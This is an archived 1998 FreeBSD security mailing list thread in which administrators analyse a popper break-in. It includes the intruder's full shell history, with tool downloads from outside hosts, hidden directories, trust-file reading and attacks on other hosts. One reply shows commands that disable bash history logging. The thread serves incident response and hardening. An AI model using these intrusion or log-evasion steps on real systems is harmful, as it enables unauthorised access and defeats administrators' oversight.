"I'd hate to advocate drugs, sex, alcohol violence... to any one, but they've worked for me." -- Hunter S. Thompson
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

From owner-freebsd-security Wed Aug 26 19:25:11 1998
Date: Thu, 27 Aug 1998 12:26:13 +1000 (EST)
From: Brendan Kosowski
To: FreeBSD Security
Subject: FreeBSD 2.2.5 Security Problem

I suspect a regular security break-in on my FreeBSD 2.2.5 system for the following reasons:

( Note1 : my system has a small number of users which I know well )
( Note2 : my inetd.conf only enables FTPD, TELNETD & POPPER )

1. My Internet costs increased by 10 times last month.

2. I often see 2 SHELLS running when I do a "ps -ax" even though I am the only person listed when I do a "who".

3. My SYSLOG messages file has lots of telnetd "undefined errors" during times when NO ONE is using the system.

Can anyone help me ???

Does anyone have AN OFFICIAL LIST OF FreeBSD 2.2.5 SECURITY HOLES and HOW TO FIX THEM ???

Thanks & Regards, Brendan...

From owner-freebsd-security Wed Aug 26 21:57:12 1998
Date: Wed, 26 Aug 1998 21:55:56 -0700 (PDT)
From: "Jan B. Koum "
To: Brendan Kosowski
cc: FreeBSD Security
Subject: Re: FreeBSD 2.2.5 Security Problem

You probably got broken into through popper. Are you running the Qualcomm version? I suspect intruders either replaced telnetd/login binaries or simply connect to popper to get a shell.
They also modified wtmp files to hide their presence on the system. This issue (popper bug) has been discussed before on this list. Anyone running FreeBSD IMHO should be on this list AND bugtraq if they care about security at all. I'd re-install the OS at this point since you have no way of knowing where you might have a back door.

FreeBSD security advisories are located at: ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/

You will not see a popper advisory in this directory since popper is not part of the OS.

If you do decide to re-install, take a look at www.best.com/~jkb/howto.txt for some basic steps one can take to make their FreeBSD a bit more secure out of the box.

-- Yan
www.best.com/~jkb/
Unix users of the world unite: www.{free,open,net}bsd.org | www.linux.org | www.apache.org | www.perl.com
"Turn up the lights, I don't want to go home in the dark."

On Thu, 27 Aug 1998, Brendan Kosowski wrote:
>
> [ original message quoted in full; see above ]
From owner-freebsd-security Wed Aug 26 22:37:27 1998
From: Wilson MacGyver
Message-Id: <199808270538.BAA01341@armitage.cylatech.com>
Subject: post breakin log
To: security@FreeBSD.ORG
Date: Thu, 27 Aug 1998 01:38:37 -0400 (EDT)
X-Mailer: ELM [version 2.4ME+ PL40 (25)]

Hi guys,

My FreeBSD box got hacked about two days ago... yes yes, via the popper. I reinstalled the system, but saved the log. I was looking through to see what he has done. There is some stuff you may find interesting... the log from history follows.

From the log, it seems he is very knowledgeable about FreeBSD. Though I must admit, I don't get why he makes the /dev/sync. Also, I don't know what the deal with the bnc* stuff is.

He installed a backdoor on my system, and then attacked a bunch of systems while he was on. He even has a FreeBSD root kit. :)

Any suggestion to prevent further break-ins is appreciated. Other than "not to run popper" anymore.
(grin)

Has anyone seen some of these programs he ran/installed/compiled before?

Thanks,
Mac

----------------------

cd /tmp
telnet localhost 110
ls -la
mv popper /usr/local/libexec/
telnet localhost 110
rm -rf free*
cd /games
ls -la
cd /dev
mkdir sync
cd sync
ftp worldnetworks.net
tar -xvf b.tar
rm -rf b.tar
cd bnc*
make
pico bnc.conf
mv bnc ..
cd ..
rm -rf bnc2*
vi bnc.conf
mv bnc pine
pine
exit
ls
cd /usr
ld
ls
cd ..
ls
cd root
ls -la
cd ..
locate bnc
locate irc
ls
locate tcp.log
cd /dev
ls
tail ptyr
tail ptyr1
tail ptyp1
tail ptyq1
uname -a
exit
ls
cd etc
pico passwd
tail passwd
cd usr
cd /usr
ls
cd sup
ls
ls -la
cd src-all
ls
locate fbsdrootkit.tgz
locate fb.tgz
locate bnc.conf
cd ..
cd local
ls
cd ..
ls
cd /dev
ls -la
tail zero
tail /root/.bash_history
cd /root
cp .bash_history h
ftp bugs.mc.duke.edu
rm h
cd /dev
cd sync
ls
tail bnc.conf
exit
cd /usr/games
ls
cd hack
cd hide
ls
ls -la
./hack
ls
cd /dev/sync
ls
ls -la
cd ..
tail ptya
locate irc
irc
BitchX
cd sync
ls
tail bnc.conf
telnet linuxppc.org
telnet irc.686.org
telnet irc686.com
telnet irc.686.com
who
telnet onyx.eng.sunysb.edu
telnet irc.686.com 90210
telnet declan.bio.columbia.edu
telnet sleepy.uncg.edu
telnet sleepy.uncg.edu
telnet desoto.coosavalley.net
telnet 209.16.220.8
telnet ramsis.spd.louisville.edu
telnet nuptse.knowledge2000.com
telnet ramses.spd.louisville.edu
telnet cc607580-a.hwrd1.md.home.com
pico
tail /root/.bash_history
ls
uptime
cd root
ls
tail .rhosts
tail /etc/hosts.equiv
cd /var/named
cd var
ls
cd /var
ls
telnet STARLIGHT1.DIGITALSTARLIGHT.COM
uname -a
telnet www.cylatech.com
rlogin -l ui8765 www.cylatech.com
ls
uname -a
ftp bugs.mc.duke.edu
gcc
gcc -o bmb bmb.c
ls
./bmb 207.153.39.89 23
ls
rm bmb*
ls
exit

From owner-freebsd-security Wed Aug 26 23:27:13 1998
To: Wilson MacGyver
cc: security@FreeBSD.ORG
Subject: Re: post breakin log
In-reply-to: Your message of "Thu, 27 Aug 1998 01:38:37 EDT." <199808270538.BAA01341@armitage.cylatech.com>
Date: Wed, 26 Aug 1998 23:26:11 -0700
Message-ID: <1143.904199171@time.cdrom.com>
From: "Jordan K. Hubbard"

> My FreeBSD box got hacked about two days ago... yes yes, via the popper.
> I reinstalled the system, but saved the log. I was looking through to
> see what he has done. There is some stuff you may find interesting...

Not really...

> From the log, it seems he is very knowledgeable about FreeBSD.

Not really... :)

> though I must admit, I don't get why he makes the /dev/sync.
> also, I don't know what the deal with the bnc* stuff

Just some rootkit. If anything, this guy looks more like a Linux kiddie than anything else - he gets his rootkits off Linux sites and seems to do most of his surfing (judging by the logs) accordingly. Also, the general use of irc & BitchX client is telling - this is clearly somebody who'd have been installing eggdrop 'bots next if he knew how to work that part out. :)

> He installed a backdoor on my system, and then attacked a bunch
> of systems while he was on. He even has a FreeBSD root kit. :)

Every 14 year old kid too young to drive or grow pubic hair has a FreeBSD rootkit. That's nothing particularly special or noteworthy these days, I hate to say.
:)

> any suggestion to prevent further break-ins is appreciated.
> other than "not to run popper" anymore. (grin)

Watch bugtraq, www.rootshell.org, CERT, etc. Actively admin your system on a daily basis. Those of us who do so were never hacked via popper or generally fall prey to the usual hack of the month (my popper was turned off no more than 2 hours after the first reports started, erm, "popping" up on the net).

- Jordan

From owner-freebsd-security Wed Aug 26 23:32:24 1998
Date: Thu, 27 Aug 1998 01:31:03 -0400 (EDT)
From: "Craig H. Rowland"
To: Wilson MacGyver
cc: security@FreeBSD.ORG
Subject: Re: post breakin log
In-Reply-To: <199808270538.BAA01341@armitage.cylatech.com>

On Thu, 27 Aug 1998, Wilson MacGyver wrote:
.
.
.
> has anyone seen some of these programs he ran/install/compile
> before?
>
> Thanks,
> Mac
>

He is mainly pulling in tools from remote hosts to further leverage his access; he is also running irc, probably a sniffer, and other typical nonsense. You should go through your log and write to the admin of each site listed to tell them about the problem so they can get rid of the intruder as well. As an example you can look at his command:

ftp worldnetworks.net

where he first went to get his bag-o-tricks to run on your box. Logging into this server you can see that it is horribly mis-configured with FTP as the owner of the root directory. The .forward file was modified to mail the passwd list off to another account, etc. I'm sure if you go down the list you'll find they are all compromised. This is pretty standard :(

The /dev/sync directory is just a hiding place for his tools. Other common places include spool directories, user home directories, etc. It's pretty hard to tell where things will be placed once inside.

The best thing to do is re-load your system (which it sounds like you've done). You'll also want to do some other things such as:

1) Ensure users don't re-use old passwords.
2) Keep up-to-date with security problems.
3) Shut off unneeded services.
4) Monitor your logs for suspicious activity.
5) Don't allow users shell access unless they need it.
6) Keep off-line cryptographically secure checksums of key system binaries and config files.
7) Limit access to system daemons to IP addresses that need them with some type of "wrapper" or IP filtering mechanism.
8) Shut off your r-services (rsh, rlogin) if you don't need them. It looks like he probably used a lot of transitive trusts (.rhosts, hosts.equiv) to move around your network.
9) Too many more to list here. :)

Shameless plug: I wrote a quick page a while back describing some of the more common attacks I've seen against hosts.
It may contain some useful information for you:

http://www.psionic.com/papers/attacks.html

-- Craig

> ----------------------
>
> [ history log quoted in full; see the original message above ]

From owner-freebsd-security Thu Aug 27 00:44:20 1998
Date: Thu, 27 Aug 1998 17:43:04 +1000 (EST)
From: Nicholas Charles Brawn
To: Wilson MacGyver
cc: security@FreeBSD.ORG
Subject: Re: post breakin log
In-Reply-To: <199808270538.BAA01341@armitage.cylatech.com>
FreeBSD.org On Thu, 27 Aug 1998, Wilson MacGyver wrote: > Hi guys, > > My FreeBSD box get hacked about two days ago... yes yes, via the popper. > I reinstalled the system, but saved the log. I was looking through to > see what he has done. There is some stuff you may find interesting... > > the log from history follows. > > >From the log, it seem he is very knowledgeable about FreeBSD. > though I must admit, I don't get why he makes the /dev/sync. > also, I don't know what the deal with the bnc* stuff If you have a log, he can't be that knowledgeable. A few simple ways of avoiding history logs include: evil@crescent:~$ echo $SHELL /usr/local/bin/bash evil@crescent:~$ ls .bash_history -rw-r--r-- 1 evil evil 904 Aug 27 04:06 .bash_history evil@crescent:~$ rm .bash_history evil@crescent:~$ ln -s /dev/null .bash_history evil@crescent:~$ ls .bash_history lrwxrwxrwx 1 evil evil 9 Aug 27 17:42 .bash_history@ -> /dev/null evil@crescent:~$ All logs will be sent to /dev/null. Another way (for bash at least), would be to export HISTFILESIZE=0. And don't forget what we can do with chflags on bsd: evil@crescent:~$ rm .bash_history evil@crescent:~$ touch .bash_history evil@crescent:~$ chflags uchg .bash_history evil@crescent:~$ ls -lo .bash_history -rw-r--r-- 1 evil evil uchg 0 Aug 27 17:44 .bash_history evil@crescent:~$ echo blah > .bash_history su: .bash_history: Operation not permitted evil@crescent:~$ Now, how can you prevent nefarious users doing the above? Using bash as an example, setup a .profile and .bashrc that and chflags them sappnd. Do the same to .bash_history. I'm sure you can think of how to do similar things with different shells. > He installed a backdoor on my system, and then attack a bunch > of systems while he was on. He even has a freebsd root kit. :) ^^^^^^^^^^^^^^^^ Trademark of a script kiddy. People you should worry about are those with custom stealth lkm's and other nastyness. > any suggestion to prevent futher break in is apprecaited. 
> other than "not to run popper" anymore. (grin) If you must allow shell access, limit it accordingly. You may want to look at a small patch that prevents users executing binaries in untrusted directories - http://rabble.uow.edu.au/~nick/security/tpe.stable.diff. > has anyone seen some of these programs he ran/install/compile > before? > > Thanks, > Mac > [ history removed ] Hope the cleanup isn't to bad. :) Nick -- Email: ncb05@uow.edu.au - http://rabble.uow.edu.au/~nick Key fingerprint = DE 30 33 D3 16 91 C8 8D A7 F8 70 03 B7 77 1A 2A "When in doubt, ask someone wiser than yourself..." -unknown To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 27 01:05:36 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id BAA00536 for freebsd-security-outgoing; Thu, 27 Aug 1998 01:05:36 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from Dolinca.IBC.IskraSistemi.Si (Dolinca.IBC.IskraSistemi.Si [194.249.213.150]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id BAA00531 for ; Thu, 27 Aug 1998 01:05:32 -0700 (PDT) (envelope-from brodnik@Dolinca.IBC.IskraSistemi.Si) Received: (from brodnik@localhost) by Dolinca.IBC.IskraSistemi.Si (8.8.8/8.8.7) id KAA19107; Thu, 27 Aug 1998 10:08:12 +0200 (CEST) (envelope-from brodnik) From: Andrej Brodnik (Andy) Message-Id: <199808270808.KAA19107@Dolinca.IBC.IskraSistemi.Si> Subject: Re: post breakin log In-Reply-To: <1143.904199171@time.cdrom.com> from "Jordan K. Hubbard" at "Aug 26, 98 11:26:11 pm" To: jkh@time.cdrom.com (Jordan K. 
Hubbard) Date: Thu, 27 Aug 1998 10:08:12 +0200 (CEST) Cc: security@FreeBSD.ORG Organization: IBC, Iskra Systems Reply-To: Andrej.Brodnik@IBC.IskraSistemi.Si (Andrej Brodnik (Andy)) X-Mailer: ELM [version 2.4ME+ PL31 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > To: Wilson MacGyver > Subject: Re: post breakin log > Date: Wed, 26 Aug 1998 23:26:11 -0700 > Watch bugtrax, www.rootshell.org, CERT, etc. Actively admin your > system on a daily basis. Is there a site one can read more on this? > Those of us who do so were never hacked via > popper or generally fall prey to the usual hack of the month (my > popper was turned off no more than 2 hours after the first reports > started, erm, "popping" up on the net). Ok, and how are the users accesing their mail then? LPA To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 27 01:28:25 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id BAA03747 for freebsd-security-outgoing; Thu, 27 Aug 1998 01:28:25 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from armitage.cylatech.com (armitage.cylatech.com [206.31.213.1]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id BAA03742 for ; Thu, 27 Aug 1998 01:28:24 -0700 (PDT) (envelope-from macgyver@armitage.cylatech.com) Received: (from macgyver@localhost) by armitage.cylatech.com (8.8.8/8.8.8) id EAA04356; Thu, 27 Aug 1998 04:29:27 -0400 (EDT) (envelope-from macgyver) From: Wilson MacGyver Message-Id: <199808270829.EAA04356@armitage.cylatech.com> Subject: Re: post breakin log In-Reply-To: <199808270808.KAA19107@Dolinca.IBC.IskraSistemi.Si> from Andrej Brodnik at "Aug 27, 98 10:08:12 am" To: Andrej.Brodnik@IBC.IskraSistemi.Si Date: Thu, 27 Aug 1998 04:29:27 -0400 (EDT) Cc: security@FreeBSD.ORG 
X-Mailer: ELM [version 2.4ME+ PL40 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> > To: Wilson MacGyver
> > Subject: Re: post breakin log
> > Date: Wed, 26 Aug 1998 23:26:11 -0700
>
> > Watch bugtrax, www.rootshell.org, CERT, etc. Actively admin your
> > system on a daily basis.
>
> Is there a site one can read more on this?

www.cert.org, www.rootshell.org, bugtrax is a mailing list.

> > Those of us who do so were never hacked via
> > popper or generally fall prey to the usual hack of the month (my
> > popper was turned off no more than 2 hours after the first reports
> > started, erm, "popping" up on the net).
>
> Ok, and how are the users accessing their mail then?

using the new popper, or use imapd-wu (which I think doesn't have this problem...)

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Thu Aug 27 01:39:31 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id BAA05283 for freebsd-security-outgoing; Thu, 27 Aug 1998 01:39:31 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from mail.ftf.dk (mail.ftf.dk [129.142.64.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id BAA05274 for ; Thu, 27 Aug 1998 01:39:29 -0700 (PDT) (envelope-from regnauld@deepo.prosa.dk)
Received: from mail.prosa.dk ([192.168.100.254]) by mail.ftf.dk (8.8.8/8.8.8/gw-ftf-1.0) with ESMTP id KAA15674; Thu, 27 Aug 1998 10:44:25 +0200 (CEST) (envelope-from regnauld@deepo.prosa.dk)
Received: from deepo.prosa.dk (deepo.prosa.dk [192.168.100.10]) by mail.prosa.dk (8.8.8/8.8.5/prosa-1.1) with ESMTP id KAA15633; Thu, 27 Aug 1998 10:48:43 +0200 (CEST)
Received: (from regnauld@localhost) by deepo.prosa.dk (8.8.8/8.8.5/prosa-1.1) id KAA14417; Thu, 27 Aug 1998 10:38:15 +0200 (CEST)
Message-ID: <19980827103815.51594@deepo.prosa.dk>
Date: Thu, 27 Aug 1998 10:38:15 +0200
From: Philippe Regnauld
To: Wilson MacGyver, security@FreeBSD.ORG
Subject: Re: post breakin log
References: <199808270538.BAA01341@armitage.cylatech.com> <1143.904199171@time.cdrom.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.88e
In-Reply-To: <1143.904199171@time.cdrom.com>; from Jordan K. Hubbard on Wed, Aug 26, 1998 at 11:26:11PM -0700
X-Operating-System: FreeBSD 2.2.6-RELEASE i386
Phone: +45 3336 4148
Address: Ahlefeldtsgade 16, 1359 Copenhagen K, Denmark
Organization: PROSA
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Jordan K. Hubbard writes:
>
> Every 14 year old kid too young to drive or grow pubic hair has a
> FreeBSD rootkit. That's nothing particularly special or noteworthy
> these days, I hate to say. :)

Right. I hate to repeat it, but 99% of attacks today are scr1pt k1ddies. The rest you don't find.

I mean, someone who successfully breaks into a machine (i.e.: Linux), successfully installs RootKit3 (the one that includes "shadowing" configuration files to hide entries in ls, ps, etc...) and then goes on to run an IRC robot + sniffer really has no clue.

The problem is these kinds of attacks:

- make a lot of noise
- increase the alertness/work ratio of new sysadmins
- make it more difficult to trace more subtle attacks

For a good starting point:

http://www.ugu.com/sui/ugu/show?I=admin.security&F=1111111111&G=Y

--
-[ Philippe Regnauld / sysadmin / regnauld@deepo.prosa.dk / +55.4N +11.3E ]-
The Internet is busy. Please try again later.
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Thu Aug 27 01:41:04 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id BAA05542 for freebsd-security-outgoing; Thu, 27 Aug 1998 01:41:04 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from mail.ftf.dk (mail.ftf.dk [129.142.64.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id BAA05536 for ; Thu, 27 Aug 1998 01:41:01 -0700 (PDT) (envelope-from regnauld@deepo.prosa.dk)
Received: from mail.prosa.dk ([192.168.100.254]) by mail.ftf.dk (8.8.8/8.8.8/gw-ftf-1.0) with ESMTP id KAA15783; Thu, 27 Aug 1998 10:45:46 +0200 (CEST) (envelope-from regnauld@deepo.prosa.dk)
Received: from deepo.prosa.dk (deepo.prosa.dk [192.168.100.10]) by mail.prosa.dk (8.8.8/8.8.5/prosa-1.1) with ESMTP id KAA15640; Thu, 27 Aug 1998 10:50:04 +0200 (CEST)
Received: (from regnauld@localhost) by deepo.prosa.dk (8.8.8/8.8.5/prosa-1.1) id KAA14473; Thu, 27 Aug 1998 10:39:36 +0200 (CEST)
Message-ID: <19980827103936.44211@deepo.prosa.dk>
Date: Thu, 27 Aug 1998 10:39:36 +0200
From: Philippe Regnauld
To: "Craig H. Rowland"
Cc: Wilson MacGyver, security@FreeBSD.ORG
Subject: Re: post breakin log
References: <199808270538.BAA01341@armitage.cylatech.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.88e
In-Reply-To: ; from Craig H. Rowland on Thu, Aug 27, 1998 at 01:31:03AM -0400
X-Operating-System: FreeBSD 2.2.6-RELEASE i386
Phone: +45 3336 4148
Address: Ahlefeldtsgade 16, 1359 Copenhagen K, Denmark
Organization: PROSA
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Craig H. Rowland writes:
>
> Shameless plug: I wrote a quick page a while back describing some of the
> more common attacks I've seen against hosts. It may contain some useful
> information for you:
>
> http://www.psionic.com/papers/attacks.html

One might want to check out the May issue of ;login: which includes an overview of common network attacks, by Aleph One (Bugtraq moderator).

--
-[ Philippe Regnauld / sysadmin / regnauld@deepo.prosa.dk / +55.4N +11.3E ]-
The Internet is busy. Please try again later.

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Thu Aug 27 01:43:01 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id BAA05954 for freebsd-security-outgoing; Thu, 27 Aug 1998 01:43:01 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from mail.ftf.dk (mail.ftf.dk [129.142.64.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id BAA05919 for ; Thu, 27 Aug 1998 01:42:44 -0700 (PDT) (envelope-from regnauld@deepo.prosa.dk)
Received: from mail.prosa.dk ([192.168.100.254]) by mail.ftf.dk (8.8.8/8.8.8/gw-ftf-1.0) with ESMTP id KAA15916; Thu, 27 Aug 1998 10:47:34 +0200 (CEST) (envelope-from regnauld@deepo.prosa.dk)
Received: from deepo.prosa.dk (deepo.prosa.dk [192.168.100.10]) by mail.prosa.dk (8.8.8/8.8.5/prosa-1.1) with ESMTP id KAA15648; Thu, 27 Aug 1998 10:51:52 +0200 (CEST)
Received: (from regnauld@localhost) by deepo.prosa.dk (8.8.8/8.8.5/prosa-1.1) id KAA14579; Thu, 27 Aug 1998 10:41:24 +0200 (CEST)
Message-ID: <19980827104124.44612@deepo.prosa.dk>
Date: Thu, 27 Aug 1998 10:41:24 +0200
From: Philippe Regnauld
To: Nicholas Charles Brawn
Cc: Wilson MacGyver, security@FreeBSD.ORG
Subject: Re: post breakin log
References: <199808270538.BAA01341@armitage.cylatech.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.88e
In-Reply-To: ; from Nicholas Charles Brawn on Thu, Aug 27, 1998 at 05:43:04PM +1000
X-Operating-System: FreeBSD 2.2.6-RELEASE i386
Phone: +45 3336 4148
Address: Ahlefeldtsgade 16, 1359 Copenhagen K, Denmark
Organization: PROSA
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Nicholas Charles Brawn writes:
>
> If you have a log, he can't be that knowledgeable. A few simple ways of
> avoiding history logs include:

Ahem. I've even had people breaking in, rm'ing the .bash_history, and just logging out -- not knowing that bash writes out the history on HUP... Duh.

14 year old seems generous :-)

--
-[ Philippe Regnauld / sysadmin / regnauld@deepo.prosa.dk / +55.4N +11.3E ]-
The Internet is busy. Please try again later.

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Thu Aug 27 01:56:00 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id BAA08379 for freebsd-security-outgoing; Thu, 27 Aug 1998 01:56:00 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from time.cdrom.com (time.cdrom.com [204.216.27.226]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id BAA08374 for ; Thu, 27 Aug 1998 01:55:58 -0700 (PDT) (envelope-from jkh@time.cdrom.com)
Received: from time.cdrom.com (jkh@localhost.cdrom.com [127.0.0.1]) by time.cdrom.com (8.8.8/8.8.8) with ESMTP id BAA07710; Thu, 27 Aug 1998 01:54:48 -0700 (PDT) (envelope-from jkh@time.cdrom.com)
To: Andrej.Brodnik@IBC.IskraSistemi.Si (Andrej Brodnik (Andy))
cc: security@FreeBSD.ORG
Subject: Re: post breakin log
In-reply-to: Your message of "Thu, 27 Aug 1998 10:08:12 +0200." <199808270808.KAA19107@Dolinca.IBC.IskraSistemi.Si>
Date: Thu, 27 Aug 1998 01:54:48 -0700
Message-ID: <7706.904208088@time.cdrom.com>
From: "Jordan K. Hubbard"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> > Watch bugtrax, www.rootshell.org, CERT, etc. Actively admin your
> > system on a daily basis.
>
> Is there a site one can read more on this?

Not to my knowledge. Alta Vista or your search engine of choice is highly recommended. :)

> Ok, and how are the users accessing their mail then?

While this particular problem existed, they either used cuipopper or they just didn't get their mail via pop until the problem was fixed.

- Jordan

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Thu Aug 27 03:00:09 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id DAA17274 for freebsd-security-outgoing; Thu, 27 Aug 1998 03:00:09 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from beeblebrox.cc.jyu.fi (beeblebrox.cc.jyu.fi [130.234.41.34]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id DAA17208 for ; Thu, 27 Aug 1998 03:00:03 -0700 (PDT) (envelope-from kallio@beeblebrox.cc.jyu.fi)
Received: (from kallio@localhost) by beeblebrox.cc.jyu.fi (8.8.7/8.8.7) id NAA00643; Thu, 27 Aug 1998 13:04:01 +0300
Message-ID: <19980827130401.B546@beeblebrox.cc.jyu.fi>
Date: Thu, 27 Aug 1998 13:04:01 +0300
From: Seppo Kallio
To: Philippe Regnauld, "Craig H. Rowland"
Cc: Wilson MacGyver, security@FreeBSD.ORG
Subject: Re: post breakin log (Saint/Nessus/?)
References: <199808270538.BAA01341@armitage.cylatech.com> <19980827103936.44211@deepo.prosa.dk>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.91.1
In-Reply-To: <19980827103936.44211@deepo.prosa.dk>; from Philippe Regnauld on Thu, Aug 27, 1998 at 10:39:36AM +0200
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, Aug 27, 1998 at 10:39:36AM +0200, Philippe Regnauld wrote:
> Craig H. Rowland writes:
> >
> > Shameless plug: I wrote a quick page a while back describing some of the
> > more common attacks I've seen against hosts. It may contain some useful
> > information for you:
> >
> > http://www.psionic.com/papers/attacks.html
>
> One might want to check out the May issue of ;login: which
> includes an overview of common network attacks, by Aleph One (Bugtraq
> moderator).

Are there good tools to make a check if my (or neighbour's) node has good security or not? I think in principle that kind of tool is possible, but it should be updated daily and easy to use (so that I can run it daily).

We are managing 10-20 Sun/Linux/FreeBSD nodes at cc, AND a lot of University staff have Linux/Sun workstations. Some simple tool to check our nodes and the nodes of the professors could be very nice!

I have heard about http://www.wwdsi.com/saint/ (Saint) and http://www.nessus.org/ (Nessus). How are they? Experiences?

I think the app should have a (secure) database somewhere on the net to check the bug-free popper version number, for example. Or easy automatic local database update (by 'mirror' or something).

--
Seppo Kallio kallio@cc.jyu.fi http://www.jyu.fi/~kallio

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Thu Aug 27 03:29:58 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id DAA20590 for freebsd-security-outgoing; Thu, 27 Aug 1998 03:29:58 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from mail.ftf.dk (mail.ftf.dk [129.142.64.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id DAA20581 for ; Thu, 27 Aug 1998 03:29:51 -0700 (PDT) (envelope-from regnauld@deepo.prosa.dk)
Received: from mail.prosa.dk ([192.168.100.254]) by mail.ftf.dk (8.8.8/8.8.8/gw-ftf-1.0) with ESMTP id MAA24073; Thu, 27 Aug 1998 12:34:47 +0200 (CEST) (envelope-from regnauld@deepo.prosa.dk)
Received: from deepo.prosa.dk (deepo.prosa.dk [192.168.100.10]) by mail.prosa.dk (8.8.8/8.8.5/prosa-1.1) with ESMTP id MAA15832; Thu, 27 Aug 1998 12:39:06 +0200 (CEST)
Received: (from regnauld@localhost) by deepo.prosa.dk (8.8.8/8.8.5/prosa-1.1) id MAA22530; Thu, 27 Aug 1998 12:28:38 +0200 (CEST)
Message-ID: <19980827122838.09246@deepo.prosa.dk>
Date: Thu, 27 Aug 1998 12:28:38 +0200
From: Philippe Regnauld
To: Seppo Kallio
Cc: security@FreeBSD.ORG
Subject: Re: post breakin log (Saint/Nessus/?)
References: <199808270538.BAA01341@armitage.cylatech.com> <19980827103936.44211@deepo.prosa.dk> <19980827130401.B546@beeblebrox.cc.jyu.fi>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.88e
In-Reply-To: <19980827130401.B546@beeblebrox.cc.jyu.fi>; from Seppo Kallio on Thu, Aug 27, 1998 at 01:04:01PM +0300
X-Operating-System: FreeBSD 2.2.6-RELEASE i386
Phone: +45 3336 4148
Address: Ahlefeldtsgade 16, 1359 Copenhagen K, Denmark
Organization: PROSA
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Seppo Kallio writes:
>
> Are there good tools to make a check if my (or neighbour's) node has good
> security or not? I think in principle that kind of tool is possible, but
> it should be updated daily and easy to use (so that I can run it daily).

From the inside:

COPS (a bit outdated)

From the network:

Check out SAINT, Nessus.
TAMU Drawbridge
NFR (this is more of a toolkit than a plug-n-play program)

Commercial:

ISS Scanner

But mostly: good security practices :-)

Check out

- Robert Watson's excellent work on FreeBSD, including his hardening project: http://www.watson.org/fbsd-hardening/
- Jan Koum's FreeBSD security HowTo: http://www.best.com/~jkb/howto.txt
- Guy Helmer wrote a good article in Sysadmin (can't find the URL right now), "Security tools in FreeBSD"

I have available on demand a bibliography of a few hundred (500-600) references to security articles/books/papers (courtesy of Osiris@pacific.net)

> Some simple tool to check our nodes and the nodes of the professors could be
> very nice!
Unplug them from the net :-)

> I have heard about http://www.wwdsi.com/saint/ (Saint) and
> http://www.nessus.org/ (Nessus). How are they? Experiences?

Saint is more for doing verifications; it picks up where SATAN left off (and indeed uses the same interface).

